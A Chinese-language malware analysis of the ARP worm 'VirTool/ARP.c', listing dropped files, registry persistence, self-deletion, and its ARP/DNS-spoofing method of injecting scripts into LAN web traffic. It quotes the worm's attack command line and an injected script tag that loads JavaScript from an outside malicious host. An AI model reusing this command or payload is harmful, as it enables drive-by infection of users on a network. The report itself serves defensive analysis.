ARP病毒“VirTool/ARP.c”的分析资料

ARP病毒“VirTool/ARP.c”的分析资料

对“ARP主安装程序”进行分析：

病毒英文名称：VirTool/ARP.c
病毒中文名称：ARP寄生虫
病毒类型：蠕虫
影响平台：Win 9X/ME/NT/2000/XP/2003
危险级别：★★

加壳名称：UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
开发编译器：Borland Delphi 6.0 - 7.0
脱壳后程序入口点：000130BC
脱壳前文件大小：321,536 字节
脱壳后文件大小：420,864 字节
说明：为了书写与观看方便，以下的“C”盘均为系统盘。

ARP病毒安装程序自我复制：
C:\windows\system32\MyArp.exe

从资源中释放恶意程序文件，并调用运行。主程序暂停300毫秒后，将该释放出来的恶意程序文件删除：
C:\Install.exe (文件大小为：246,272 字节)

从资源中释放恶意程序文件：
C:\windows\system32\arps.exe (文件大小为：43,323 字节)

采用“SW_HIDE”属性(后台隐藏窗口)在被感染计算机后台利用控制台带参数的命令方式去调用具有ARP攻击功能的恶意程序“arps.exe”来进行攻击操作：
“arps.exe -idx 0 -ip 127.0.0.2-127.0.0.254 -port 80 -insert "<script language=javascript src=http://www.lovemsn520.cn/msn/1.js></script>”
说明：（其中：“arps.exe”为ARP攻击程序，“127.0.0.2-127.0.0.254”被攻击的IP段，“80”为攻击端口，“<script language=javascript src=http://www.lovemsn520.cn/msn/1.js></script>”使被攻击计算机在打开网页时后台连接的恶意挂马网址。）

注册表启动项：
启动项位置：HKEY_CURRENT_USER\SoftWare\Microsoft\Windows\CurrentVersion\Run
启动项名称：MyArp.exe
恶意程序路径：C:\windows\system32\MyArp.exe

删除注册表项“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp”中的“NoRealMode”键，使“禁止使用MS－DOS方式”的功能失效。

“ARP主安装程序”执行完毕安装任务后，会创建批处理文件进行调用，从而达到自我删除的目的：
C:\windows\system32\Deleteme.bat
----------------------------------------------------------------------------------
对“Install.exe”恶意程序进行分析：

加壳名称：UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
开发编译器：Borland Delphi 6.0 - 7.0
脱壳后程序入口点：00007F48
脱壳前文件大小：246,272 字节
脱壳后文件大小：620,544 字节

从资源中释放恶意程序文件：
C:\windows\system32\drivers\pop.sys (文件类型为：驱动程序，文件大小为：42,000 字节，属性设置为：只读、隐藏、存档)
C:\windows\system32\popsky.dll (文件类型为：DLL连接库程序，编译器为：Visual C++ 6.0 DLL，文件大小为：88,952 字节，属性设置为：只读、隐藏、存档)
C:\windows\system32\ShowPOPDO.dll (文件类型为：DLL连接库程序，编译器为：Visual C++ 6.0 DLL，文件大小为：68,480 字节，属性设置为：只读、隐藏、存档)
C:\windows\system32\ipopi.dll (文件类型为：DLL连接库程序，编译器为：Visual C++ 6.0 DLL，文件大小为：240,496 字节，属性设置为：只读、隐藏、存档)
C:\windows\system32\arps.exe (文件类型为：EXE程序，经过加壳保护处理，文件大小为：43,323 字节，属性设置为：只读、隐藏、存档)
C:\windows\system32\poptools.dll (文件类型为：DLL连接库程序，采用高级语言编写，文件大小为：54,272 字节，属性设置为：只读、隐藏、存档)

上边这些恶意组件文件都是属于“arps.exe”恶意程序所要调用的动态连接库文件，功能都十分强大(可能是网络上某些公司或开发小组发布的免费公用的功能组件程序文件)。
当它们被调用时，会在被感染计算机系统的注册表中创建一些配置信息和插件启动项，还会执行很多其它恶意操作。
----------------------------------------------------------------------------------
对“arps.exe”恶意程序进行分析：

采用C或VC++语言编写，属于控制台程序，并经过添加多层压缩、保护壳处理。

通过定位网段群发ARP欺骗包，然后拦截自身所在局域网中的部分HTTP通讯包进行过滤，采用dns欺骗(构建应答包)，进行在正常网页的回应数据包代码中插入恶意的骇客挂马地址代码“<script language=javascript src=http://www.lovemsn520.cn/msn/1.js></script>”，从而使没有安装全系统或其它软件漏洞补丁的计算机系统中毒(网页木马下载其它恶意程序到被感染计算机中，并安装执行)。

“arps.exe”恶意程序还会在被感染计算机系统的后台调用“Install.exe”恶意程序所释放出来的部分DLL动态连接库组件程序，执行其它恶意性的操作。